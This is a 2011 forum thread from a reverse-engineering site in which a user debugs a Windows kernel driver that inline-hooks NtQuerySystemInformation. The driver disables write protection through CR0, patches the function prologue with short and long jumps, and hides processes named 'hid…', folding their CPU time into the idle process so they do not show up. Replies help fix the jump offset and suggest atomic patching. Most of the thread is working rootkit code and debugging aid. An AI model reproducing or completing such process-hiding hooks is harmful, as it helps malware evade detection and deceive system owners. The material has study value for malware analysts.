A forum for reverse engineering, OS internals and malware analysis 

Ask your beginner questions here.
 #8805  by r2nwcnydc
 Wed Sep 28, 2011 1:27 pm
lorddoskias wrote:But using just 1 function won't I find the stack in a trashed state unless I use declspec(naked)?
No, the function will act the same as the original function: it will set up and restore ebp and esp for you. Also, you call the original function with a new function call, which pushes the parameters onto the stack, so the original function handles setting up and tearing down esp and ebp for that call.
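A minimal user-mode sketch of that point, not driver code: the replacement is an ordinary compiled function, so the compiler emits its prologue and epilogue, and the original is reached through a function pointer like any other call. The names `query_fn`, `original_query`, `real_query` and `hooked_query` are made up for illustration.

```c
#include <stddef.h>

/* Hypothetical signature standing in for the hooked routine. */
typedef int (*query_fn)(int info_class, void *buffer, size_t length);

/* Stand-in for the original routine: reports the length it was given. */
static int original_query(int info_class, void *buffer, size_t length)
{
    (void)info_class;
    (void)buffer;
    return (int)length;
}

/* Pointer through which the replacement reaches the original. */
static query_fn real_query = original_query;

/* Ordinary (non-naked) replacement: the compiler sets up and tears down
 * the stack frame, and the nested call pushes its own arguments. */
static int hooked_query(int info_class, void *buffer, size_t length)
{
    int status = real_query(info_class, buffer, length);
    if (status < 0)
        return status;  /* pass failures through untouched */
    /* any post-processing of the returned buffer would go here */
    return status;
}
```

Nothing here needs a naked function, because the wrapper never touches the caller's frame by hand.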
 #8880  by lorddoskias
 Sat Oct 01, 2011 2:56 am
Then according to your line of thought the following should work:

Code: Select all
typedef NTSTATUS  (__stdcall *QUERY_SYS_INFO)(
	__in       SYSTEM_INFORMATION_CLASS SystemInformationClass,
	__inout    PVOID SystemInformation,
	__in       ULONG SystemInformationLength,
	__out_opt  PULONG ReturnLength
	);


QUERY_SYS_INFO ZwQuerySystemInformation = NULL;
QUERY_SYS_INFO myNtQuerySystemInformation = NULL;




NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING  RegistryPath)
{
//some code omitted
RtlInitUnicodeString(&FuncName, L"ZwQuerySystemInformation");
	ZwQuerySystemInformation = (QUERY_SYS_INFO)MmGetSystemRoutineAddress(&FuncName);
	myNtQuerySystemInformation = (QUERY_SYS_INFO)getRealFuncAddress((BYTE *)ZwQuerySystemInformation, KeServiceDescriptorTable.KiServiceTable);
	myNtQuerySystemInformation = (QUERY_SYS_INFO) ((PBYTE)myNtQuerySystemInformation + 2);
if( NT_SUCCESS(inlineHookInstall()) ) {
		DbgPrint("Successfully patched the function\n");
	}
//code omitted for brevity
}
Code: Select all
NTSTATUS inlineHookInstall() {
	NTSTATUS status;
	UNICODE_STRING FuncName = {0};
	DWORD dwOldCR0 = 0;
	BYTE *funcPointer = NULL; 

	//get the address we want to start overwriting
	funcPointer = getRealFuncAddress((BYTE *)ZwQuerySystemInformation, KeServiceDescriptorTable.KiServiceTable);
		
	if(!funcPointer) {
		DbgPrint("Error getting the real address of NtQuerySystemInformation\n");
		return STATUS_UNSUCCESSFUL;
	}
		
	DbgPrint("Address of NTQUERYSYSINFO IS %p\n", funcPointer);
	
	dwOldCR0=__readcr0();
	__writecr0(dwOldCR0&~(1<<16));
	writeBytesToMemSafe(funcPointer);
	__writecr0(dwOldCR0);

	return STATUS_SUCCESS;
}
Code: Select all
void writeBytesToMemSafe(PVOID Addr) {
	BYTE shortJMP[] = "\xEB\xF9";
	BYTE longJMP[] = "\xE9\xDE\xAD\xBE\xEF";
	
	//now instead of 0XDEADBEEF we have the address of our routine.
	FixJMPAddress(longJMP, (BYTE *) myZwQuerySystemInformation, (BYTE *) Addr);
	//overwrite the nopsled
	RtlCopyMemory((PBYTE)Addr - 5 , longJMP, 5);

	//copy the short jump instead of mov edi, edi
	RtlCopyMemory((PBYTE) Addr, shortJMP, 2); 

	DbgPrint("Jump fixed address: %p\n", Prolog_NtQuerySys);
}

Code: Select all
NTSTATUS myZwQuerySystemInformation(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength) 
{
	NTSTATUS ntStatus;
	PSYSTEM_PROCESS_INFORMATION currentProcInfo;
	PSYSTEM_PROCESS_INFORMATION previousProcInfo;
	BYTE *tempMath;


	ntStatus = myNtQuerySystemInformation(SystemInformationClass, SystemInformation, SystemInformationLength, ReturnLength);
	if(!NT_SUCCESS(ntStatus))
		return ntStatus;
//code omitted for brevity
Basically I take the address of the Nt routine from the SSDT index of ZwQuerySystemInformation and use that in my hook function, but unfortunately this doesn't work. Execution ends up in a region that consists of nothing but int 3 and nothing happens. The overwrites are performed correctly, but when the code jumps to my hook function everything goes south.

Here is what my assembly looks like:
Code: Select all
nt!NtQuerySystemInformation:
0x8288A416  jmp nt!CmpDereferenceKeyControlBlockWithLock+0xb1 (8288a411) 
0x8288A418  push ebp 
0x8288A419  mov ebp,esp 
0x8288A41B  mov edx,dword ptr [ebp+8] 
0x8288A41E  cmp edx,53h 
Code: Select all
0x8288A411  jmp SSDThook!SSDThookDefaultHandler+0x3b (9469e2cb) 
Code: Select all
0x9469E2CC  int 3 
0x9469E2CD  int 3 
0x9469E2CE  int 3 
0x9469E2CF  int 3 
--- e:\drivers\development\ssdthook\ssdthook\ssdthook.cpp ----------------------
{
0x9469E2D0  mov edi,edi 
0x9469E2D2  push ebp 
0x9469E2D3  mov ebp,esp 
0x9469E2D5  sub esp,20h 
0x9469E2D8  push esi 
0x9469E2D9  push edi 
and at some point my code just keeps looping in the INT3 region o_O
 #8892  by Brock
 Sat Oct 01, 2011 9:33 am
@lorddoskias

How familiar are you with function entrypoint rewriting / hooking? Why are you calling a function "writeBytesToMemSafe"? What makes RtlCopyMemory safe? It isn't for many reasons but I understand why you are using it. Best to use atomic operations when you are able to...
 #8893  by lorddoskias
 Sat Oct 01, 2011 9:52 am
Brock wrote:@lorddoskias

How familiar are you with function entrypoint rewriting / hooking? Why are you calling a function "writeBytesToMemSafe"? What makes RtlCopyMemory safe? It isn't for many reasons but I understand why you are using it. Best to use atomic operations when you are able to...
Hi, as is evident, I'm still learning the techniques; the name is just a naming convention. And it is safe, because before rewriting I do some "tricks" such as raising the current CPU's IRQL to DISPATCH_LEVEL and queuing DPCs to the other cores/CPUs, which spin in an __asm { nop; } loop. I don't know if this is the correct way to do it, but it works. For me it is important to see the concept working. Right now the rewriting happens correctly (as far as I can see in the debugger), but when my detour is used the aforementioned situation happens.


EDIT:

Okay, I found the cause and fixed it. Basically, in the fixJMP function the offset has to be calculated as offset = newroutine - oldroutine, not as offset = newroutine - oldroutine - sizeofjmp.

But now my VM is completely sluggish after the detour is installed. Any ideas why this might be the case? I don't see this when I hook the SSDT.
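As far as the posted disassembly shows, the numbers work out like this: the long jump sits at 0x8288A411 (five bytes before NtQuerySystemInformation at 0x8288A416) and the hook function starts at 0x9469E2D0. A `JMP rel32` is relative to the address of the next instruction, which here is already the start of the old routine, so subtracting the jump size a second time lands five bytes short, at 0x9469E2CB in the int 3 padding. The sketch below is plain user-mode C; the helper names are made up for illustration.

```c
#include <stdint.h>

enum { JMP_REL32_SIZE = 5 };  /* 0xE9 opcode + 4-byte displacement */

/* Displacement for a JMP rel32 located at jmp_addr that should land on
 * target. The CPU adds the displacement to the address of the NEXT
 * instruction, i.e. jmp_addr + 5. */
static uint32_t jmp_rel32(uint32_t jmp_addr, uint32_t target)
{
    return target - (jmp_addr + JMP_REL32_SIZE);
}

/* Where a JMP rel32 at jmp_addr with displacement rel actually lands. */
static uint32_t jmp_rel32_dest(uint32_t jmp_addr, uint32_t rel)
{
    return jmp_addr + JMP_REL32_SIZE + rel;
}
```

With `jmp_addr = oldroutine - 5`, `jmp_rel32` reduces to `newroutine - oldroutine`, which matches the fix described above.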
 #9092  by 0xC0000022L
 Tue Oct 11, 2011 8:06 pm
Raising the IRQL would work. Holding a spinlock does that implicitly, IIRC.
lorddoskias wrote:Okay, I found the cause and fixed it. Basically, in the fixJMP function the offset has to be calculated as offset = newroutine - oldroutine, not as offset = newroutine - oldroutine - sizeofjmp.

But now my VM is completely sluggish after the detour is installed. Any ideas why this might be the case? I don't see this when I hook the SSDT.
Show us the "//code omitted for brevity" part and we may be able to tell you what's wrong. It's perfectly possible that you are not playing by some of the rules that have to be followed in kernel mode.
 #9191  by lorddoskias
 Sun Oct 16, 2011 11:17 am
Sorry for the late response:

Here is the code which hides a process and works perfectly fine if I perform SSDT hooking, but when I do a detour it makes the whole VM very sluggish:
Code: Select all
NTSTATUS myZwQuerySystemInformation(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength) 
{
	NTSTATUS ntStatus;
	PSYSTEM_PROCESS_INFORMATION currentProcInfo;
	PSYSTEM_PROCESS_INFORMATION previousProcInfo;
	BYTE *tempMath;


	ntStatus = myNtQuerySystemInformation(SystemInformationClass, SystemInformation, SystemInformationLength, ReturnLength);
	if(!NT_SUCCESS(ntStatus))
		return ntStatus;

	if(SystemInformationClass == SystemProcessorPerformanceInformation) {
		PSYSTEM_PROCESSOR_PERFORMANCE_INFORMATION timeObject;
		LONGLONG extraTime;

		timeObject = (PSYSTEM_PROCESSOR_PERFORMANCE_INFORMATION)SystemInformation;
		extraTime = timeHiddenUser.QuadPart + timeHiddenKernel.QuadPart;
		timeObject->IdleTime.QuadPart += extraTime;

	}

	if(SystemInformationClass != SystemProcessInformation) 
		return ntStatus;

	/*   FROM THIS POINT ONWARDS WE ASSUME WE ARE CALLED ABOUT PROCESSINFORMATION */

	currentProcInfo = (PSYSTEM_PROCESS_INFORMATION) SystemInformation;
	previousProcInfo = NULL;

	while (currentProcInfo != NULL)
	{
		//IF THIS IS TRUE THEN WE HAVE THE IDLE PROCESS - INJECT OUR OWN PROCESS TIME
		if(currentProcInfo->ImageName.Buffer == NULL) {
			currentProcInfo->UserTime.QuadPart += timeHiddenUser.QuadPart;
			currentProcInfo->KernelTime.QuadPart += timeHiddenKernel.QuadPart;

			timeHiddenKernel.QuadPart = 0;
			timeHiddenUser.QuadPart = 0;

		} else {

			if(memcmp(currentProcInfo->ImageName.Buffer, L"hid", 6) == 0) {
				//we have to hide this process
				//1. Get the time of this process
				timeHiddenUser.QuadPart += currentProcInfo->UserTime.QuadPart;
				timeHiddenKernel.QuadPart += currentProcInfo->KernelTime.QuadPart;

				//2. Check our position in the returned array and do pointer trickery 
				if(previousProcInfo != NULL) {

					//if current is last -> make previous last
					if(currentProcInfo->NextEntryOffset == 0) {
						previousProcInfo->NextEntryOffset = 0;

						//if we are somewhere in the middle - skip us
					} else {
						//might be wrong
						previousProcInfo->NextEntryOffset = previousProcInfo->NextEntryOffset + currentProcInfo->NextEntryOffset;

					}
				} else {
					//we are the first and only.
					if(currentProcInfo->NextEntryOffset == 0) {
						SystemInformation = NULL;
						//we are the first of many
					} else {
						tempMath = (BYTE *)SystemInformation + currentProcInfo->NextEntryOffset;
						SystemInformation  = (PSYSTEM_PROCESS_INFORMATION)tempMath;
						tempMath = NULL;
					}
				}

				DbgPrint("Process Hidden\n");
			}
		}

		previousProcInfo = currentProcInfo;
		if(currentProcInfo->NextEntryOffset == 0) {
			currentProcInfo = NULL;
		} else {
			tempMath = (BYTE *)currentProcInfo + currentProcInfo->NextEntryOffset;
			currentProcInfo = (PSYSTEM_PROCESS_INFORMATION)tempMath;
			tempMath = NULL;
		}
	}


	return ntStatus;
}
 #9212  by 0xC0000022L
 Mon Oct 17, 2011 3:32 pm
lorddoskias wrote:Here is the code which hides a process and works perfectly fine if I perform SSDT hooking, but when I do a detour it makes the whole VM very sluggish
Okay, here's what looks odd to me:

myZwQuerySystemInformation is apparently your replacement function (right?), but inside it you call myNtQuerySystemInformation instead of the real ZwQuerySystemInformation ... what about that? How does that myNtQuerySystemInformation look? Are you certain you don't end up in some kind of recursion here?

Also, where do you store timeHiddenUser and timeHiddenKernel? Are those part of the driver extension or static data inside your code?
 #9217  by lorddoskias
 Mon Oct 17, 2011 6:19 pm
First of all I'd like to thank you that you are actually taking the time to answer. Much appreciated.

Now, on to your question: timeHidden is a global variable defined in my .c file. You guessed correctly that myZwQuerySystemInformation is the replacement function; in it I call myNtQuerySystemInformation because this is actually the address of the _REAL_ NtQuery function. This is a case of shitty naming, I'd say :). Here is the code:
Code: Select all
	
myNtQuerySystemInformation = (QUERY_SYS_INFO)getRealFuncAddress((BYTE *)ZwQuerySystemInformation, KeServiceDescriptorTable.KiServiceTable);
myNtQuerySystemInformation = (QUERY_SYS_INFO) ((PBYTE)myNtQuerySystemInformation + 2);
As you can see, I correctly point it to 2 bytes after the beginning, because the first 2 bytes now hold the short jump. What I can't understand is why this works when I do SSDT hooking but not when I do inline patching. Also, if you feel like it, I'm willing to send you my source files so that you can compile and run them and see if you experience the same problem.
 #9221  by 0xC0000022L
 Mon Oct 17, 2011 9:40 pm
lorddoskias wrote:As you can see, I correctly point it to 2 bytes after the beginning, because the first 2 bytes now hold the short jump. What I can't understand is why this works when I do SSDT hooking but not when I do inline patching. Also, if you feel like it, I'm willing to send you my source files so that you can compile and run them and see if you experience the same problem.
Well, as I understand it, it works, but it messes up something timing-related (sluggish VM).

OK, help me get the facts straight here:
  1. you don't do SSDT hooking at the moment?
  2. you patch inline by overwriting some opcode (which?) at the beginning of the function with a short jump to the previously written long jump located at function address minus 5 (because 5 is the size of the long jump), right?
  3. you got the calculation of the jump address right, so you don't end up in the CC-area (int3)?
At this point you seem to be doing almost everything right that we can see. So unless it's something subtle I'm missing, let's rule out other possible causes. Can you simply replace your whole myZwQuerySystemInformation routine with this one:
Code: Select all
NTSTATUS myZwQuerySystemInformation(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength) 
{
   return myNtQuerySystemInformation(SystemInformationClass, SystemInformation, SystemInformationLength, ReturnLength);
}
Once built and run, does this still cause the same slowdown you have previously encountered?

Oh, and could you show us a byte dump (WinDbg) of the memory around (i.e. also a bit before) the patched function, so we can see what's going on there?!
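To make the layout in point 2 concrete, here is a small user-mode sketch that builds the same byte pattern in an ordinary buffer and checks where each jump leads. It only illustrates the encoding and assumes five padding bytes in front of the entry point and a two-byte first instruction; `build_patch` and `short_jmp_dest` are made-up names, and nothing here touches real code.

```c
#include <stdint.h>
#include <string.h>

enum { PAD = 5 };  /* padding bytes assumed in front of the entry point */

/* Write the patch bytes around `entry` (the function's first byte inside a
 * plain buffer). entry_addr is the address the function is assumed to have
 * at run time, target the address of the replacement routine. */
static void build_patch(uint8_t *entry, uint32_t entry_addr, uint32_t target)
{
    /* The long jump ends exactly at entry_addr, so no extra -5 is needed. */
    uint32_t rel32 = target - entry_addr;

    entry[-PAD] = 0xE9;                 /* JMP rel32 */
    memcpy(entry - 4, &rel32, 4);       /* stored in host byte order (x86: little-endian) */
    entry[0] = 0xEB;                    /* JMP rel8 */
    entry[1] = 0xF9;                    /* -7, counted from entry + 2 */
}

/* Offset, relative to entry, that the short jump at entry transfers to. */
static int short_jmp_dest(const uint8_t *entry)
{
    return 2 + (int8_t)entry[1];
}
```

For the addresses in this thread, `short_jmp_dest` gives -5, i.e. the start of the long jump, and the long jump resolves to the hook function itself rather than the padding before it.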
 #9228  by newgre
 Tue Oct 18, 2011 8:33 am
If I understood correctly, he patches a short jump at the beginning of NtQuerySystemInformation. It only takes two bytes and overwrites the usual
Code: Select all
mov edi, edi
code sequence (the code sequence exists for that very reason). Also, he can't be landing in a CC area, otherwise he would see exceptions / a blue screen.
Btw, the code that installs the hook is inherently unsafe: what if you write the patch while some thread is executing the entry point? Patching the short jump should be made atomic. Have you tried single-stepping through your hook?
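A rough illustration of what "atomic" means for the two-byte patch, written as portable C11 in user mode rather than as driver code: both bytes are packed into one 16-bit value and swapped in with a single atomic exchange, so a reader sees either the old pair or the new pair, never a mix. This assumes the two bytes are naturally aligned (the entry point in this thread, 0x8288A416, is even); in a driver the equivalent would presumably be an interlocked 16-bit exchange. The helper names are hypothetical.

```c
#include <stdatomic.h>
#include <stdint.h>

/* Pack two instruction bytes into the 16-bit value that stores them in
 * memory order on a little-endian machine such as x86. */
static uint16_t pack_le16(uint8_t first, uint8_t second)
{
    return (uint16_t)(first | (second << 8));
}

/* Replace both bytes with one atomic exchange and return the previous pair. */
static uint16_t swap_two_bytes(_Atomic uint16_t *slot, uint16_t value)
{
    return atomic_exchange(slot, value);
}
```

The five-byte long jump in the padding can be written beforehand with ordinary stores, since nothing executes it until the short jump is in place.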